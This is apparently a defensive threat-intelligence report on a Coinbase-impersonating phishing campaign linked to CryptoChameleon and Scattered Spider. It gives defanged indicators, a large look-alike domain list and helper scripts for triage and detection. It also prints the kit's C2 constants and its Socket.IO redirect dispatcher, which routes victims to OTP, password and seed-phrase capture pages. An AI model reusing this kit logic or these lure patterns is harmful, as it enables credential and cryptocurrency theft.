# **CryptoChameleon Campaign Associations with Scattered Spider**

**Date of Report**: 2024-12-04\
**Reporting Agency**: Cipher\
**Report Composed By**: Cipher\
**Type of Incident**: Social Engineering, Phishing\
**Phishing Target**: `@Tayvano`\
**Estimated Loss**: N/A - No user impacts

## Executive Summary

**Overview**: This report expands on the capabilities and infrastructure of a threat actor that research indicates is targeting cryptocurrency companies and developers.

| Key Information | Detail |
| :--- | :--- |
| Incident Date and Time | `2024-11-30` |
| Phishing Website | `1735562-coinbase[.]com/captcha?origin=.` |
| Snapshot of Malicious Site | `https://urlquery.net/report/8cea3a49-64a4-4373-a52a-7c5a73cd5e32` |
| Attacker Email Sender | `help@xn--conbase-sfb[.]com` |
| Attacker Phone | `802-772-0215` |

**Report TLP Classification**: 🟢 Green

## Incident Background

### Phishing Attempt Events

On `November 30, 2024`, [@Tayvano](https://x.com/tayvano_) received repeated phone calls from `802-772-0215` and was then emailed the link `1735562-coinbase[.]com/captcha?origin=.` from the sender `help@xn--conbase-sfb[.]com`. The sender domain is an `xn--` (punycode) label, i.e. an internationalized domain name chosen to look like the Coinbase brand. The JavaScript served by the malicious link indicates a targeted social engineering and credential phishing operation hosted at IP `195[.]133[.]92[.]187`. Analysis by the target, @Tayvano, identified the instance's control servers: `hxxps[://]c26[.]commandandcontrolserver[.]com` and `hxxps[://]c26x2[.]commandandcontrolserver[.]com/api`. The [initial threat report and analysis by @Tayvano](https://x.com/tayvano_/status/1863025389385503020) prompted the further analysis below. The purpose of this report is to document correlations with past known Scattered Spider activity.
### Financial Impact

No financial impacts or further user impacts were reported, as the target is highly technical and an information security subject matter expert.

## Technical Analysis

| URL | Size | First Seen | Last Seen |
| :--- | ---: | :--- | :--- |
| 1735562-coinbase[.]com/js/index/core[.]js | 301 B | 2024-12-01 05:51 | 2024-12-01 05:51 |
| 1735562-coinbase[.]com/js/init[.]js | 6.9 kB | 2024-12-01 05:51 | 2024-12-01 05:51 |
| cdn[.]socket[.]io/4.5.4/socket[.]io[.]min[.]js | 44 kB | 2023-03-12 17:27 | 2024-12-01 11:09 |
| 1735562-coinbase[.]com/js/consts[.]js | 161 B | 2024-12-01 05:51 | 2024-12-01 05:51 |
| 1735562-coinbase[.]com/js/index/script[.]js | 232 B | 2023-11-19 14:01 | 2024-12-01 05:51 |

This phishing sample is claimed to belong to the "CryptoChameleon" campaign described in the [report by Lookout](https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit). The page loads Socket.IO 4.5.4 from the public CDN and uses the `consts[.]js` file to define the control servers it talks to. However, further inspection and random sampling of credential phishing instances on the same infrastructure show a pattern more closely aligned with Scattered Spider activity.

```js
const SERVER_URL = 'hxxps[://]c26[.]commandandcontrolserver[.]com';
const API_URL = 'hxxps[://]c26x2[.]commandandcontrolserver[.]com/api';
const OLD_PW_ON_RESET_PAGE = true;
```

The wide array of operator-driven redirect functionality can be observed at the path `/js/init[.]js`: the control server pushes a `userRedirect` event over the Socket.IO channel, and the page sends the victim to whichever brand-specific credential, OTP, or seed-phrase page the operator selects.
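The redirect dispatcher in `init[.]js` is long, and the first triage question for a captured kit is which brands and which page types (OTP, password reset, seed phrase) it can serve, and where it reports to. The following script is an added example for this report, not code from the kit or from the original analysis: it pulls the quoted constants out of `consts[.]js`, enumerates every `data.response` route in `init[.]js`, groups the routes by brand prefix, and flags seed-phrase pages. The embedded JavaScript is a constructed excerpt modelled on the snippets quoted in this report (a handful of routes, not the full file), and the `BRANDS` prefix list is an assumption drawn from the route names.

```python
import re
from collections import defaultdict

# Constructed excerpts modelled on the kit's consts.js and init.js quoted in this
# report (a handful of the routes, not the full file). Hostnames are the defanged
# values from the report; nothing here touches the network.
CONSTS_JS = """
const SERVER_URL = 'hxxps[://]c26[.]commandandcontrolserver[.]com';
const API_URL = 'hxxps[://]c26x2[.]commandandcontrolserver[.]com/api';
const OLD_PW_ON_RESET_PAGE = true;
"""

INIT_JS = """
socket.on('userRedirect', async (data) => {
  if (data.response === '/otp_sms' || data.response === '/twitter_sms') {
    document.location.href = basePath + data.response + '?n=' + data.digits;
  } else if (data.response === '/gemini_seed' || data.response === '/kraken_seed') {
    document.location.href = basePath + data.response + '?e=' + data.e;
  } else if (data.response == '/lastpass_inbox' || data.response == '/dvc_press') {
    document.location.href = basePath + data.response + '?email=' + data.address;
  } else if (data.response === '/redirect') {
    document.location.href = basePath + data.response + '?url=' + encodeURIComponent(data.url);
  }
});
"""

# Quoted string constants of the form  const NAME = '...';  (booleans are skipped)
CONST_RE = re.compile(r"const\s+(\w+)\s*=\s*'([^']*)'")
# Every route the operator can push, whether the kit compares with === or ==
ROUTE_RE = re.compile(r"data\.response\s*===?\s*'(/[A-Za-z0-9_]+)'")

# Assumed brand tokens used as route prefixes in the kit. Order matters so that
# 'coinbase' is tried before the shorter 'cb'. Anything else is reported as 'generic'.
BRANDS = ("coinbase", "cb", "gemini", "kraken", "binance", "kucoin", "uphold",
          "swan", "lastpass", "gmail", "yahoo", "aol", "outlook", "icloud", "twitter")


def extract_c2(consts_js: str) -> dict:
    """Return the quoted string constants (SERVER_URL, API_URL, ...) from consts.js."""
    return dict(CONST_RE.findall(consts_js))


def extract_routes(init_js: str) -> list:
    """Return the distinct data.response routes in first-seen order."""
    return list(dict.fromkeys(ROUTE_RE.findall(init_js)))


def group_routes(routes: list) -> dict:
    """Group routes by the brand they impersonate, e.g. '/kraken_seed' -> 'kraken'."""
    groups = defaultdict(list)
    for route in routes:
        name = route.lstrip("/")
        brand = next((b for b in BRANDS if name == b or name.startswith(b + "_")), "generic")
        groups[brand].append(route)
    return dict(groups)


def seed_capture_routes(routes: list) -> list:
    """Routes whose name signals wallet seed-phrase harvesting, the highest-impact pages."""
    return [r for r in routes if r == "/seed" or r.endswith("_seed")]


if __name__ == "__main__":
    c2 = extract_c2(CONSTS_JS)
    routes = extract_routes(INIT_JS)
    print("C2 endpoints:", c2)
    print("routes by brand:", group_routes(routes))
    print("seed-phrase pages:", seed_capture_routes(routes))
```

To run it against a real capture, replace the two embedded strings with the contents of the downloaded `consts.js` and `init.js`; the route list is also a convenient source of URL-path indicators for web-proxy hunting.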
<details>
<summary>expand snippet relevant to `/js/init[.]js` here</summary>

```js
// Operator-driven redirect: the control server emits 'userRedirect' over Socket.IO
// and the page forwards the victim to the selected brand-specific lure page.
socket.on('userRedirect', async (data) => {
  if (sessionStorage.getItem('user') === data.user && sessionStorage.getItem('user') !== null) {
    // The redirect token is validated against the API server before acting on it.
    const redirectTkn = data.redirectTkn;
    const d = await fetch(`${API_URL}/verify`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ token: redirectTkn }),
    });
    const res = await d.json();
    if (!res.valid) return;
    const basePath = window.location.href.substring(0, window.location.href.lastIndexOf('/'));
    // Each branch builds the query string the target page expects (digits, email, header text, ...).
    if (data.response === '/otp_sms' || data.response === '/twitter_sms') {
      document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e + '&f=' + data.format;
    } else if (data.response === '/outlook_otp' || data.response === '/binance_sms') {
      document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e;
    } else if (data.response === '/custom') {
      document.location.href = basePath + data.response + '?h=' + data.header + '&p=' + data.paragraph;
    } else if (
      data.response === '/otp_auth' ||
      data.response === '/yahoo' ||
      data.response === '/reset_password' ||
      data.response === '/outlook_pw' ||
      data.response === '/gemini_otp' ||
      data.response === '/gemini_reset' ||
      data.response === '/gemini_seed' ||
      data.response === '/kraken' ||
      data.response === '/kraken_otp' ||
      data.response === '/icloud' ||
      data.response === '/twitter' ||
      data.response === '/twitter_auth' ||
      data.response === '/gmail' ||
      data.response === '/binance' ||
      data.response === '/binance_auth' ||
      data.response === '/gemini_signin' ||
      data.response === '/uphold' ||
      data.response === '/uphold_otp' ||
      data.response === '/uphold_reset' ||
      data.response === '/uphold_seed' ||
      data.response === '/binance_seed' ||
      data.response === '/kraken_seed' ||
      data.response === '/lastpass' ||
      data.response === '/lastpass_otp' ||
      data.response === '/swan' ||
      data.response === '/swan_seed' ||
      data.response === '/swan_eotp' ||
      data.response === '/swan_otp' ||
      data.response === '/swan_auth' ||
      data.response === '/swan_dvc' ||
      data.response === '/gemini_dvc' ||
      data.response === '/kucoin' ||
      data.response === '/kucoin_otp' ||
      data.response === '/kucoin_pin' ||
      data.response === '/kucoin_seed'
    ) {
      if (data.response === '/gmail' && data.e === 1) {
        document.location.href = basePath + '/gmail_pw?e=' + data.e;
      } else {
        document.location.href = basePath + data.response + '?e=' + data.e;
      }
    } else if (data.response === '/signin') {
      document.location.href = basePath + data.response + '?e=' + data.e + '&t=' + data.t;
    } else if (data.response === '/pending_review') {
      document.location.href = basePath + data.response + '?d=' + btoa(data.date);
    } else if (data.response === '/aol_otp' || data.response === '/yahoo_otp' || data.response === '/gmail_otp') {
      document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&e=' + data.e;
    } else if (data.response === '/yahoo_eotp') {
      document.location.href = basePath + data.response + '?email=' + data.address + '&recovery=' + data.recovery + '&e=' + data.e;
    } else if (data.response == '/gmail_eotp' || data.response == '/gmail_auth' || data.response == '/otp_email') {
      document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e;
    } else if (data.response == '/lastpass_inbox' || data.response == '/dvc_press') {
      document.location.href = basePath + data.response + '?email=' + data.address;
    } else if (data.response === '/gmail_device') {
      document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&app=' + data.app;
    } else if (data.response === '/aol' || data.response === '/gmail_backup') {
      document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e;
    } else if (data.response === '/seed') {
      document.location.href = basePath + data.response + '?auth=' + data.auth;
    } else if (data.response === '/cb_customwallet') {
      document.location.href = basePath + data.response + '?w=' + data.w;
    } else if (data.response === '/icloud_otp') {
      document.location.href = basePath + data.response + '?p=' + data.p + '&e=' + data.e;
    } else if (data.response === '/device_auth') {
      document.location.href = basePath + data.response + '?device=' + data.device + '&location=' + data.location;
    } else if (data.response === '/redirect') {
      // Open redirect to an arbitrary operator-supplied URL, e.g. the real site once credentials are captured.
      document.location.href = basePath + data.response + '?url=' + encodeURIComponent(data.url);
    } else if (data.response === '/icloud_2fa') {
      document.location.href = basePath + data.response + '?d=' + data.d;
    } else if (data.response === '/cbw1') {
      document.location.href = basePath + data.response + '?s=' + btoa(data.s);
    } else {
      document.location.href = basePath + data.response;
    }
  }
});
```

</details>

### Domain Research

Domains were searched using Validin, Censys, Silent Push, and UrlScan[.]io in order to maximize research surface.

VirusTotal graph of the related infrastructure: https://www.virustotal.com/graph/embed/g97f881e0970340eca55e0b33440d413ee77a2a8a3c024f7c9dffd7942e36fd8f?theme=dark

Baseline regex for the numeric-prefix cryptocurrency brand impersonation domains (`[.]` is a literal dot; the `\[?\.\]?` before the TLD tolerates the defanged `[.]com` form):

```regex
\b(?:www[.]|\d+[-])?0*\d{5,}-(coinbase|binance|gemini|kraken|ledger|trezor)\[?\.\]?com\b
```

The baseline was then used to build a counter pattern: domains on the same infrastructure that do not match it were reviewed separately. One such non-matching instance, a Google impersonation observed on `2024-12-07`, reuses the same `/captcha?origin=` path structure as the Coinbase sample: `hxxps[://]cancel-google[.]com/captcha?origin=gmail` (urlscan result: https://pro.urlscan.io/result/460e3ae0-9718-431c-b065-84ddab1d525c).

(Figure: example of homograph domain names; image sourced from https://www.researchgate.net/figure/Example-of-homograph-domain-names_fig2_335823813)

#### Domains observed at IP `195[.]133[.]92[.]187` at time of event

<details>
<summary>expand</summary>

- 12518234-coinbase[.]com
- 125980-binance[.]com
- 128594-gemini[.]com
- 129581-coinbase[.]com
- 129645-coinbase[.]com
- 143516-coinbase[.]com
- 14522564-coinbase[.]com
- 147852-kraken[.]com
- 148942-coinbase[.]com
- 149024-google[.]com
- 1502759-ledger[.]com
- 151294-kraken[.]com
- 152674-coinbase[.]com
- 157192-uphold[.]com
- 1581932-coinbase[.]com
- 158248-gemini[.]com
- 159120-coinbase[.]com
- 159823-coinbase[.]com
- 1652137-coinbase[.]com
- 17255030-coinbase[.]com
- 17384624-coinbase[.]com
- 17503-apple[.]com
- 1750314-apple[.]com
- 1759654-coinbase[.]com
- 17691-coinbase[.]com
- 177250-cb[.]com
- 177250-kraken[.]com
- 178492-coinbase[.]com
- 178526-coinbase[.]com
- 179325-coinbase[.]com
- 18364712-coinbase[.]com
- 184625-trezor[.]com
- 1847039-coinbase[.]com
- 185126-coinbase[.]com
- 185924-uphold[.]com
- 19045-coinbase[.]com
- 191284-gemini[.]com
- 19243652-coinbase[.]com
- 19265-coinbase[.]com
- 19453264-coinbase[.]com
- 19463752-coinbase[.]com
- 1947245-google[.]com
- 194857-kraken[.]com
- 195-133-92-187[.]waldertype[.]com
- 195024-coinbase[.]com
- 19513657-coinbase[.]com
- 195824-swanbtc[.]com
- 19642-coinbase[.]com
- 197287-coinbase[.]com
- 27954383-coinbase[.]com
- 283272-coinbase[.]com
- 298193-coinbase[.]com
- 489912-coinbase[.]com
- 53201-coinbase[.]com
- 592013-apple[.]com
- 76159869-coinbase[.]com
- 77195062-coinbase[.]com
- 848312-coinbase[.]com
- 884394-coinbase[.]com
- 917260-coinbase[.]com
- 923852-coinbase[.]com
- administration-icloud[.]com
- adsupport-google[.]com
- argoworkflow[.]binancesecurity[.]com
- bcmone[.]mypasskey[.]info
- binancesecurity[.]com
- bruno[.]skybluesimply[.]com
- calls-coinbase[.]com
- cancel-google[.]com
- cb-panel[.]com
- cdn[.]receipt-coinbase[.]com
- coinbase[.]passkeysetup[.]com
- coinbasehelpdesk[.]com
- coinbasetickets[.]com
- cpanel[.]coinbasehelpdesk[.]com
- cpcalendars[.]coinbasehelpdesk[.]com
- cpcontacts[.]1947245-google[.]com
- cpcontacts[.]coinbasehelpdesk[.]com
- cpcontacts[.]dashboard-kucoin[.]com
- cpcontacts[.]yahoohelpdesk[.]com
- dash[.]s-kucoin[.]com
- dashboard-kraken[.]com
- dashboard-kucoin[.]com
- ebdisk[.]17255030-coinbase[.]com
- emv1[.]148942-coinbase[.]com
- emv1[.]1502759-ledger[.]com
- emv1[.]17384624-coinbase[.]com
- emv1[.]1759654-coinbase[.]com
- emv1[.]19463752-coinbase[.]com
- emv1[.]firewall-cb[.]com
- emv1[.]lastpasshelp[.]com
- emv1[.]protection-kraken[.]com
- emv1[.]ticketsupport-coinbase[.]com
- establish-coinbase[.]com
- firewall-cb[.]com
- fraudulent-coinbase[.]com
- gamdomrewards[.]com
- google[.]mypasskey[.]info
- help-applecare[.]com
- help-coinbasesupport[.]com
- helpdesk-google[.]com
- hostmaster[.]msfthelpdesk[.]com
- hostmaster[.]www[.]msfthelpdesk[.]com
- idsmac-apple[.]com
- iticket-apple[.]com
- lastpasshelp[.]com
- mail[.]coinbasehelpdesk[.]com
- mail[.]yahoohelpdesk[.]com
- msfthelpdesk[.]com
- mypasskey[.]info
- passkeysetup[.]com
- portal-exodus[.]com
- portal-trezor[.]io
- protection-kraken[.]com
- receipt-coinbase[.]com
- refund-cb[.]com
- revert-kraken[.]com
- s-binance[.]com
- s-gemini[.]com
- s-kucoin[.]com
- secureaccess-coinbase[.]com
- shield-cbwallet[.]com
- signin-kraken[.]com
- signin-swanbitcoin[.]com
- staging[.]verification-gemini[.]com
- startrecovery-coinbase[.]com
- swap-coinbase[.]com
- ticketsupport-coinbase[.]com
- verification-gemini[.]com
- verification-trezor[.]com
- verify-ledger[.]com
- webdisk[.]coinbasehelpdesk[.]com
- webmail[.]coinbasehelpdesk[.]com
- www-help-gemini[.]com
- www[.]12518234-coinbase[.]com
- www[.]125980-binance[.]com
- www[.]128594-gemini[.]com
- www[.]129581-coinbase[.]com
- www[.]129645-coinbase[.]com
- www[.]143516-coinbase[.]com
- www[.]148942-coinbase[.]com
- www[.]149024-google[.]com
- www[.]1502759-ledger[.]com
- www[.]157192-uphold[.]com
- www[.]1581932-coinbase[.]com
- www[.]159120-coinbase[.]com
- www[.]159823-coinbase[.]com
- www[.]1652137-coinbase[.]com
- www[.]17255030-coinbase[.]com
- www[.]17384624-coinbase[.]com
- www[.]1759654-coinbase[.]com
- www[.]17691-coinbase[.]com
- www[.]178492-coinbase[.]com
- www[.]178526-coinbase[.]com
- www[.]179325-coinbase[.]com
- www[.]18364712-coinbase[.]com
- www[.]185126-coinbase[.]com
- www[.]185924-uphold[.]com
- www[.]19045-coinbase[.]com
- www[.]19265-coinbase[.]com
- www[.]19453264-coinbase[.]com
- www[.]19463752-coinbase[.]com
- www[.]1947245-google[.]com
- www[.]195024-coinbase[.]com
- www[.]19513657-coinbase[.]com
- www[.]19642-coinbase[.]com
- www[.]197287-coinbase[.]com
- www[.]27954383-coinbase[.]com
- www[.]283272-coinbase[.]com
- www[.]298193-coinbase[.]com
- www[.]53201-coinbase[.]com
- www[.]592013-apple[.]com
- www[.]76159869-coinbase[.]com
- www[.]884394-coinbase[.]com
- www[.]917260-coinbase[.]com
- www[.]923852-coinbase[.]com
- www[.]adsupport-google[.]com
- www[.]binancesecurity[.]com
- www[.]calls-coinbase[.]com
- www[.]cancel-google[.]com
- www[.]coinbasehelpdesk[.]com
- www[.]coinbasetickets[.]com
- www[.]emv1[.]protection-kraken[.]com
- www[.]establish-coinbase[.]com
- www[.]firewall-cb[.]com
- www[.]fraudulent-coinbase[.]com
- www[.]help-applecare[.]com
- www[.]help-coinbasesupport[.]com
- www[.]helpdesk-google[.]com
- www[.]idsmac-apple[.]com
- www[.]iticket-apple[.]com
- www[.]lastpasshelp[.]com
- www[.]msfthelpdesk[.]com
- www[.]passkeysetup[.]com
- www[.]portal-trezor[.]io
- www[.]protection-kraken[.]com
- www[.]receipt-coinbase[.]com
- www[.]refund-cb[.]com
- www[.]s-binance[.]com
- www[.]shield-cbwallet[.]com
- www[.]signin-kraken[.]com
- www[.]startrecovery-coinbase[.]com
- www[.]swap-coinbase[.]com
- www[.]ticketsupport-coinbase[.]com
- www[.]verification-gemini[.]com
- www[.]webmail[.]coinbasehelpdesk[.]com
- www[.]www-help-gemini[.]com
- www[.]yahoohelpdesk[.]com
- yahoohelpdesk[.]com
- zsb[.]125980-binance[.]com

</details>

## Report Objectives

This report is intended to inform cryptocurrency companies and developers of an active phishing campaign that could affect anyone in the ecosystem. It is also intended to bring the matter to the attention of law enforcement for extended analysis, and to draw greater interest from the information security community, since the actors behind these instances can rotate domain names and expand their reach rapidly.
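The Domain Research section above gives the baseline regex and notes that the sender address uses a punycode (`xn--`) domain. The script below is an added example for this report, not code from the original analysis: it splits a sample of the observed hostnames into baseline matches and the counter set that needs manual review, and decodes an `xn--` label to show what the victim's mail client actually displays. The sample domain list is a constructed subset of the list above; the `CONFUSABLES` map is a small hand-picked subset of look-alike characters and `BRANDS` a short assumed brand list, not the full Unicode confusables table.

```python
import codecs
import re
import unicodedata

# Baseline pattern from the Domain Research section. `[.]` is a literal dot and
# `\[?\.\]?` before the TLD tolerates the defanged `[.]com` form, so re.search
# works on defanged and live hostnames alike.
BASELINE = re.compile(
    r"\b(?:www[.]|\d+[-])?0*\d{5,}-(coinbase|binance|gemini|kraken|ledger|trezor)\[?\.\]?com\b",
    re.IGNORECASE,
)

# Constructed sample: a handful of the domains listed for 195[.]133[.]92[.]187.
SAMPLE_DOMAINS = [
    "12518234-coinbase[.]com",
    "www[.]125980-binance[.]com",
    "147852-kraken[.]com",
    "1502759-ledger[.]com",
    "cancel-google[.]com",
    "coinbasehelpdesk[.]com",
    "195-133-92-187[.]waldertype[.]com",
]

# Hand-picked subset of look-alike characters (illustrative only; the UTS #39
# confusables table is far larger): Latin dotless i plus a few Cyrillic letters.
CONFUSABLES = {
    "\u0131": "i",  # LATIN SMALL LETTER DOTLESS I
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u043e": "o", "\u0430": "a", "\u0435": "e", "\u0441": "c", "\u0440": "p", "\u0455": "s",
}
# Assumed brand list for the homograph check.
BRANDS = ("coinbase", "binance", "gemini", "kraken", "ledger", "trezor", "google", "apple")


def classify(domains):
    """Split hostnames into baseline matches (with the brand hit) and the counter set."""
    matched, counter = [], []
    for host in domains:
        m = BASELINE.search(host)
        if m:
            matched.append((host, m.group(1).lower()))
        else:
            counter.append(host)
    return matched, counter


def decode_punycode_label(label):
    """Decode one xn-- label to Unicode; any other label is returned unchanged."""
    if not label.lower().startswith("xn--"):
        return label
    return codecs.decode(label[4:].encode("ascii"), "punycode")


def skeleton(text):
    """Strip accents and map confusables so a look-alike compares equal to the brand."""
    decomposed = unicodedata.normalize("NFKD", text)
    stripped = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    return "".join(CONFUSABLES.get(ch, ch) for ch in stripped).lower()


def homograph_target(label):
    """Return the brand an IDN label visually imitates, or None if it is plain ASCII / no hit."""
    decoded = decode_punycode_label(label)
    if decoded == label:
        return None  # nothing was decoded, so no homograph to assess
    sk = skeleton(decoded)
    return sk if sk in BRANDS else None


if __name__ == "__main__":
    hits, rest = classify(SAMPLE_DOMAINS)
    print("baseline matches:", hits)
    print("counter set (review by hand):", rest)
    sender_label = "xn--conbase-sfb"  # from help@xn--conbase-sfb[.]com in this report
    print(sender_label, "->", decode_punycode_label(sender_label),
          "imitates", homograph_target(sender_label))
```

The counter set is where the non-numeric lures (`cancel-google[.]com`, the `*helpdesk[.]com` family) surface, which is the review the report describes; the punycode decode shows the sender domain renders as a dotless-i spelling of the Coinbase brand, which is why a plain string match against `coinbase` misses it.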
## Conclusion

This incident highlights the mature tooling behind the campaign: operator-driven redirects pushed over a live Socket.IO channel, lure pages tailored to dozens of exchange, wallet, mail and password-manager brands, and a large pool of look-alike and punycode domains on shared infrastructure. It emphasizes the need for heightened awareness and security measures, including verifying unsolicited support calls and emails through official channels rather than the contact details they supply.

## Interaction with Law Enforcement

**Agencies Notified**: N/A\
**Notification Date**:\
**Report Reference Number**:

## References and Attachments

- [Trellix: Scattered Spider - The Modus Operandi](https://www.trellix.com/blogs/research/scattered-spider-the-modus-operandi/)
- [Lookout: CryptoChameleon FCC Phishing Kit](https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit)
- [AlienVault OTX Pulse](https://otx.alienvault.com/pulse/6658476de649d167335d6250)
- [Black Hat webcast: A Modern Kill Chain Case Study - The CryptoChameleon Phishing Kit](https://www.blackhat.com/html/webcast/05232024.html)
- [Silent Push: 'Reptile Recon' - using IP diversity queries to map out CryptoChameleon fast flux IOFAs](https://www.silentpush.com/blog/cryptochameleon/)
- [VMware: Beware of CryptoChameleon, the new phishing threat that uses social engineering to trick victims](https://blogs.vmware.com/euc/2024/03/beware-of-cryptochameleon-the-new-phishing-threat-that-uses-social-engineering-to-trick-victims.html)